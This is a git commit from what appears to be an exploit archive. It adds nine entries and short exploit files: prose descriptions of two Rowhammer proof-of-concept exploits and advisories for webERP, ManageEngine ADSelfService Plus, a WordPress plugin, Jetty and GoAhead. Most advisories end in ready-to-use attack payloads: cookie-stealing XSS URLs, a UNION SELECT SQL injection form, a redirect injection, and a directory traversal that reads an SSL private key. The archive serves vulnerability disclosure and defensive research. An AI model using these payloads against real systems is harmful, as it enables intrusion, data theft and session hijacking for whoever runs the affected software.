Update: 2015-03-11

9 new exploits
2015-03-11 08:35:40 +00:00 · 2015-03-11 08:35:40 +00:00 · b2e56e1634
commit b2e56e1634
parent 22f053cf5e
10 changed files with 162 additions and 0 deletions
--- a/files.csv
+++ b/files.csv
@ -32726,3 +32726,12 @@ id,file,description,date,author,platform,type,port
 36304,platforms/windows/remote/36304.rb,"HP Data Protector 8.10 Remote Command Execution",2015-03-06,metasploit,windows,remote,5555
 36307,platforms/php/webapps/36307.html,"Search Plugin for Hotaru CMS 1.4.2 admin_index.php SITE_NAME Parameter XSS",2011-11-13,"Gjoko Krstic",php,webapps,0
 36308,platforms/php/webapps/36308.txt,"Webistry 1.6 'pid' Parameter SQL Injection Vulnerability",2011-11-16,CoBRa_21,php,webapps,0
+36310,platforms/lin_x86-64/local/36310.txt,"Rowhammer: Linux Kernel Privilege Escalation PoC",2015-03-09,"Google Security Research",lin_x86-64,local,0
+36311,platforms/lin_x86-64/local/36311.txt,"Rowhammer: NaCl Sandbox Escape PoC",2015-03-09,"Google Security Research",lin_x86-64,local,0
+36313,platforms/php/webapps/36313.txt,"webERP <= 4.3.8 Multiple Script URI XSS",2011-11-17,"High-Tech Bridge SA",php,webapps,0
+36314,platforms/php/webapps/36314.txt,"webERP <= 4.3.8 reportwriter/ReportMaker.php reportid Parameter SQL Injection",2011-11-17,"High-Tech Bridge SA",php,webapps,0
+36315,platforms/php/webapps/36315.txt,"webERP <= 4.3.8 reportwriter/FormMaker.php ReportID Parameter SQL Injection",2011-11-17,"High-Tech Bridge SA",php,webapps,0
+36316,platforms/php/webapps/36316.txt,"ZOHO ManageEngine ADSelfService Plus 4.5 Build 4521 Cross Site Scripting Vulnerability",2011-11-17,"James webb",php,webapps,0
+36317,platforms/php/webapps/36317.txt,"WordPress Flexible Custom Post Type plugin 'id' Parameter Cross Site Scripting Vulnerability",2011-11-17,Am!r,php,webapps,0
+36318,platforms/windows/remote/36318.txt,"Jetty Web Server Directory Traversal Vulnerability",2011-11-18,"Alexey Sintsov",windows,remote,0
+36319,platforms/windows/remote/36319.txt,"GoAhead WebServer 2.5 'goform/formTest' Multiple Cross Site Scripting Vulnerabilities",2011-11-18,"Prabhu S Angadi",windows,remote,0
--- a/platforms/lin_x86-64/local/36310.txt
+++ b/platforms/lin_x86-64/local/36310.txt
@ -0,0 +1,21 @@
+Sources:
+http://googleprojectzero.blogspot.ca/2015/03/exploiting-dram-rowhammer-bug-to-gain.html
+https://code.google.com/p/google-security-research/issues/detail?id=283
+
+Full PoC: http://www.exploit-db.com/sploits/36310.tar.gz
+
+This is a proof-of-concept exploit that is able to gain kernel
+privileges on machines that are susceptible to the DRAM "rowhammer"
+problem.  It runs as an unprivileged userland process on x86-64 Linux.
+It works by inducing bit flips in page table entries (PTEs).
+
+For development purposes, the exploit program has a test mode in which
+it induces a bit flip by writing to /dev/mem.  qemu_runner.py will run
+the exploit program in test mode in a QEMU VM.  It assumes that
+"bzImage" (in the current directory) is a Linux kernel image that was
+built with /dev/mem enabled (specifically, with the the
+CONFIG_STRICT_DEVMEM option disabled).
+
+Mark Seaborn
+mseaborn@chromium.org
+March 2015
--- a/platforms/lin_x86-64/local/36311.txt
+++ b/platforms/lin_x86-64/local/36311.txt
@ -0,0 +1,33 @@
+Sources:
+http://googleprojectzero.blogspot.ca/2015/03/exploiting-dram-rowhammer-bug-to-gain.html
+https://code.google.com/p/google-security-research/issues/detail?id=284
+
+Full PoC: http://www.exploit-db.com/sploits/36311.tar.gz
+
+
+This is a proof-of-concept exploit that is able to escape from Native
+Client's x86-64 sandbox on machines that are susceptible to the DRAM
+"rowhammer" problem.  It works by inducing a bit flip in read-only
+code so that the code is no longer safe, producing instruction
+sequences that wouldn't pass NaCl's x86-64 validator.
+
+Note that this uses the CLFLUSH instruction, so it doesn't work in
+newer versions of NaCl where this instruction is disallowed by the
+validator.
+
+There are two ways to test the exploit program without getting a real
+rowhammer-induced bit flip:
+
+ * Unit testing: rowhammer_escape_test.c can be compiled and run as a
+   Linux executable (instead of as a NaCl executable).  In this case,
+   it tests each possible bit flip in its code template, checking that
+   each is handled correctly.
+
+ * Testing inside NaCl: The patch "inject_bit_flip_for_testing.patch"
+   modifies NaCl's dyncode_create() syscall to inject a bit flip for
+   testing purposes.  This syscall is NaCl's interface for loading
+   code dynamically.
+
+Mark Seaborn
+mseaborn@chromium.org
+March 2015
--- a/platforms/php/webapps/36313.txt
+++ b/platforms/php/webapps/36313.txt
@ -0,0 +1,22 @@
+source: http://www.securityfocus.com/bid/50713/info
+
+webERP is prone to information-disclosure, SQL-injection, and cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied input.
+
+An attacker may exploit the information-disclosure issue to gain access to sensitive information that may lead to further attacks.
+
+An attacker may exploit the SQL-injection issue to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+
+An attacker may leverage the cross-site scripting issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks.
+
+webERP 4.0.5 is vulnerable; prior versions may also be affected. 
+
+http://www.example.com/doc/manual/manualcontents.php/%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
+http://www.example.com/index.php/%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
+http://www.example.com/AccountGroups.php/%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
+http://www.example.com/AccountSections.php/%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
+http://www.example.com/AddCustomerContacts.php/%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E%3C/html%3E
+http://www.example.com/AddCustomerNotes.php/%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E%3C/html%3E
+http://www.example.com/Areas.php/%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
+http://www.example.com/AddCustomerTypeNotes.php/%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
+http://www.example.com/AgedDebtors.php/%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
+http://www.example.com/AgedSuppliers.php/%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
--- a/platforms/php/webapps/36314.txt
+++ b/platforms/php/webapps/36314.txt
@ -0,0 +1,13 @@
+source: http://www.securityfocus.com/bid/50713/info
+ 
+webERP is prone to information-disclosure, SQL-injection, and cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied input.
+ 
+An attacker may exploit the information-disclosure issue to gain access to sensitive information that may lead to further attacks.
+ 
+An attacker may exploit the SQL-injection issue to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+ 
+An attacker may leverage the cross-site scripting issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks.
+ 
+webERP 4.0.5 is vulnerable; prior versions may also be affected. 
+
+http://www.example.com/reportwriter/ReportMaker.php?action=go&reportid=SQL_CODE_HERE
--- a/platforms/php/webapps/36315.txt
+++ b/platforms/php/webapps/36315.txt
@ -0,0 +1,18 @@
+source: http://www.securityfocus.com/bid/50713/info
+  
+webERP is prone to information-disclosure, SQL-injection, and cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied input.
+  
+An attacker may exploit the information-disclosure issue to gain access to sensitive information that may lead to further attacks.
+  
+An attacker may exploit the SQL-injection issue to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+  
+An attacker may leverage the cross-site scripting issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks.
+  
+webERP 4.0.5 is vulnerable; prior versions may also be affected. 
+
+<form action="http://www.example.com/reportwriter/FormMaker.php" method="post">
+<input type="hidden" name="ReportID" value="1 union select version(),2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20">
+<input type="hidden" name="FormID" value="[FormID]" />
+<input type="hidden" name="todo" value="Criteria Setup" />
+<input type="submit" value="submit" id="btn">
+</form>
--- a/platforms/php/webapps/36316.txt
+++ b/platforms/php/webapps/36316.txt
@ -0,0 +1,23 @@
+source: http://www.securityfocus.com/bid/50717/info
+
+ZOHO ManageEngine ADSelfService Plus is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks.
+
+ManageEngine ADSelfService Plus 4.5 Build 4521 is vulnerable; other versions may also be affected. 
+
+Proof of Concept
+===================
+Double-Quote String Termination
+HTTP Request =
+https://serverip:port/EmployeeSearch.cc?searchType=contains&searchBy=ALL_FIELDS&searchString=";alert("XSS");//\"
+
+Response Source View
+<script language="javascript">
+var searchValue = "';alert(XSS)//\"";
+
+
+Single-Quote String Termination
+Similarly...
+HTTP Request
+https://serverip:port/EmployeeSearch.cc?searchType=';document.location="http://www.cnn.com";//\"&searchBy=ALL_FIELDS&searchString=BoB
--- a/platforms/php/webapps/36317.txt
+++ b/platforms/php/webapps/36317.txt
@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/50719/info
+
+Flexible Custom Post Type plugin for WordPress is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. 
+
+http://www.example.com/[path]/wp-content/plugins/flexible-custom-post-type/edit-post.php?id=[xss] 
--- a/platforms/windows/remote/36318.txt
+++ b/platforms/windows/remote/36318.txt
@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/50723/info
+
+Jetty Web Server is prone to a directory-traversal vulnerability because it fails to sufficiently sanitize user-supplied input.
+
+Exploiting this issue will allow an attacker to view arbitrary files within the context of the webserver. Information harvested may aid in launching further attacks. 
+
+http://www.example.com:9084/vci/downloads/.\..\..\..\..\..\..\..\Documents and Settings\All Users\Application Data\VMware\VMware VirtualCenter\SSL\rui.key 
--- a/platforms/windows/remote/36319.txt
+++ b/platforms/windows/remote/36319.txt
@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/50729/info
+
+GoAhead WebServer is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data.
+
+An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks.
+
+GoAhead WebServer 2.5 is vulnerable; other versions may also be affected. 
+
+http://www.example.com/goform/formTest?name=%3Cscript%3Ealert(4321)%3C/script%3E&address=%3Cscript%3Ealert(1234)%3C/script%3E